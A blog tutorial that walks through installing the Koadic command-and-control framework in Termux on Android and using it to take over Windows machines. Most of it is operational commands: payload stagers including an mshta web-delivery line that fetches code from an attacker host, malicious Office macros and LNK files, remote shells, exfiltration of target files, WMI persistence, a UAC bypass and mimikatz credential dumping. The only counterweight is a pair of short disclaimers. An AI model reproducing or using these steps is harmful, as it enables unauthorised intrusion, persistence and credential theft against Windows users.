Control Any Windows Using Nethunter Termux | Koadic

August 5, 2023 18 min read Sandeep Tech Team

Koadic in Action

Watch this demonstration of Koadic C2 Framework running in Termux. The video shows the complete process from installation to controlling Windows systems. This visual guide will help you understand how to transform your Android device into a powerful Windows control center.

In the world of ethical hacking and penetration testing, having the right tools at your fingertips is crucial. With the combination of Nethunter, Termux, and Koadic, you can transform your Android device into a powerful Windows control center. This comprehensive guide will walk you through the entire process of setting up and using Koadic to control Windows machines directly from your Android device.

JS
Based
No Root
Required
Light
Weight
Full
Control

What is Koadic?

Koadic is a command-and-control (C2) tool similar to Metasploit's Meterpreter, but with a focus on being lightweight and JavaScript-based. It's designed to help penetration testers establish control over target systems through various attack vectors. Koadic stands for "COM Command & Control" and leverages Windows Script Host (WSH) to execute payloads, making it particularly effective against Windows systems.

Educational Purpose Only

Koadic should only be used for educational purposes and authorized security testing. Unauthorized use of penetration testing tools is illegal and unethical. Always obtain proper permission before conducting any security tests.

Why Use Koadic with Termux and Nethunter?

Combining Koadic with Termux and Nethunter offers several advantages:

Installation Guide

Installing Koadic in Termux requires several steps due to its dependencies. Follow this guide carefully:

Setting Up Termux

First, ensure you have Termux installed on your Android device. You can download it from F-Droid.

Update and upgrade Termux packages pkg update && pkg upgrade -y Install required packages pkg install wget curl git python python2 -y Install additional dependencies pkg install openssl libffi libgmp libpcap readline sqlite -y

Installing Koadic

Now, let's install Koadic:

Clone the Koadic repository git clone https://github.com/zerosum0x/koadic.git Navigate to the Koadic directory cd koadic Install Koadic requirements pip install -r requirements.txt Make Koadic executable chmod +x koadic

Setting Up Nethunter (Optional)

If you want to use Nethunter for additional tools and wireless attacks:

Install Nethunter Store wget -O install-nethunter-termux https://offs.ec/2MceZWr chmod +x install-nethunter-termux ./install-nethunter-termux Update Nethunter packages apt update && apt upgrade -y

Getting Started with Koadic

Now that Koadic is installed, let's start it and explore its interface:

Start Koadic ./koadic

When you first start Koadic, you'll see a welcome screen and the Koadic prompt:

koadic
$ ./koadic
 ___________
|  |   |   |
|  |   |   |

.-'   |   |   |
'      |   |   |
|      |   |   |
|      |   |   |
|      |   |   |
'------'   '---'

Koadic C2 Framework v9.0.0

koadic (staged) >

The Koadic prompt is where you'll enter all commands. Let's explore some basic commands to get familiar with the interface.

Basic Usage and Commands

Here are some essential commands to get started with Koadic:

Help and Information

Show help menu koadic (staged) > help Show all commands koadic (staged) > ? Show information about a specific command koadic (staged) > ? use

Managing Modules

List all available modules koadic (staged) > ls Use a specific module koadic (staged) > use stager/js/dll Show information about the current module koadic (staged) > info Show options for the current module koadic (staged) > info

Understanding Modules

Koadic is modular, with each module serving a specific purpose. The main types of modules are:

Module Organization

Koadic modules are organized by category and function. The naming convention follows the pattern: category/type/name. For example, stager/js/dll is a stager module that uses JavaScript to create a DLL payload.

Working with Payloads

Koadic offers several types of payloads, primarily JavaScript-based:

Types of Payloads

Generating Payloads

Use a specific stager module koadic (staged) > use stager/js/dll Set the required options koadic (staged: stager/js/dll) > set SRVHOST 192.168.1.100 koadic (staged: stager/js/dll) > set SRVPORT 8080 Generate the payload koadic (staged: stager/js/dll) > run

Exploitation Techniques

Koadic supports various exploitation techniques to deliver payloads to Windows systems:

1. Web Delivery

Use the web delivery stager koadic (staged) > use stager/js/mshta Set the listening host and port koadic (staged: stager/js/mshta) > set SRVHOST 192.168.1.100 koadic (staged: stager/js/mshta) > set SRVPORT 8080 Run the stager koadic (staged: stager/js/mshta) > run The victim can execute the payload with: mshta http://192.168.1.100:8080/abc

2. Macro-Based Delivery

Use the macro stager koadic (staged) > use stager/js/office_macro Set the required options koadic (staged: stager/js/office_macro) > set SRVHOST 192.168.1.100 koadic (staged: stager/js/office_macro) > set SRVPORT 8080 Generate the macro koadic (staged: stager/js/office_macro) > run

3. LNK File Delivery

Use the LNK stager koadic (staged) > use stager/js/lnk Set the required options koadic (staged: stager/js/lnk) > set SRVHOST 192.168.1.100 koadic (staged: stager/js/lnk) > set SRVPORT 8080 Generate the LNK file koadic (staged: stager/js/lnk) > run

Post-Exploitation

Once you have established a session with a target system, you can perform various post-exploitation tasks:

Managing Sessions

List all active sessions koadic (staged) > sessions Interact with a specific session koadic (staged) > sessions 1 Background the current session koadic (zombie 1) > bg Kill a session koadic (staged) > kill 1

Post-Exploitation Commands

Get system information koadic (zombie 1) > sysinfo Get current user koadic (zombie 1) > whoami List processes koadic (zombie 1) > ps List files in current directory koadic (zombie 1) > ls Change directory koadic (zombie 1) > cd C:\ Download a file from the target koadic (zombie 1) > download C:\important_file.txt Upload a file to the target koadic (zombie 1) > upload /sdcard/file.txt C:\ Execute a command on the target koadic (zombie 1) > shell whoami Get a shell on the target koadic (zombie 1) > shell

Advanced Features

Koadic offers several advanced features for more sophisticated penetration testing:

Persistence

Use the persistence module koadic (staged) > use implant/persistence/wmi_event_subscription Set the target zombie koadic (staged: implant/persistence/wmi_event_subscription) > set ZOMBIE 1 Run the persistence module koadic (staged: implant/persistence/wmi_event_subscription) > run

Privilege Escalation

Use the privilege escalation module koadic (staged) > use privesc/bypassuac_eventvwr Set the target zombie koadic (staged: privesc/bypassuac_eventvwr) > set ZOMBIE 1 Run the privilege escalation module koadic (staged: privesc/bypassuac_eventvwr) > run

Credential Harvesting

Use the credential harvesting module koadic (staged) > use creds/mimikatz/sam_dump Set the target zombie koadic (staged: creds/mimikatz/sam_dump) > set ZOMBIE 1 Run the credential harvesting module koadic (staged: creds/mimikatz/sam_dump) > run

Ethical Considerations

While Koadic is a powerful tool, it's important to use it ethically and responsibly:

Legal Warning

Unauthorized use of Koadic or any penetration testing tools is illegal in most jurisdictions. This tutorial is for educational purposes only. Always obtain proper permission before conducting any security tests.

Interactive Demo

Try Koadic Commands

Experience the power of Koadic with our interactive command simulator. Try running some basic commands to see how they work.

koadic
$ Type a command or click a button below

Command Reference

Koadic Commands

Command Description Example
./koadic Start the Koadic console ./koadic
help Show help menu help
ls List all available modules ls
use Select a module use stager/js/dll
info Show information about the current module info
set Set a module option set SRVHOST 192.168.1.100
run Execute the current module run
sessions List all active sessions sessions
sessions [id] Interact with a specific session sessions 1
bg Background the current session bg
kill [id] Kill a session kill 1
shell Execute a shell command shell whoami
download Download a file from the target download C:\file.txt
upload Upload a file to the target upload /sdcard/file.txt C:\

Koadic in Termux with Nethunter brings the power of professional penetration testing to your Android device. Whether you're a security professional, an ethical hacker, or just someone interested in learning about cybersecurity, Koadic provides a comprehensive platform for testing and securing Windows systems. Remember to always use these tools ethically and with proper authorization.

Back to Blogs

Leave a Comment

Alex Johnson
August 6, 2023
Amazing guide! I've been looking for a way to use Koadic on Android for months. The JavaScript-based approach is brilliant and much stealthier than traditional methods. Thanks for the detailed instructions!
Sarah Williams
August 7, 2023
This is exactly what I needed for my security studies. Having Koadic on my phone means I can practice Windows exploitation techniques anywhere. The section on post-exploitation was particularly helpful!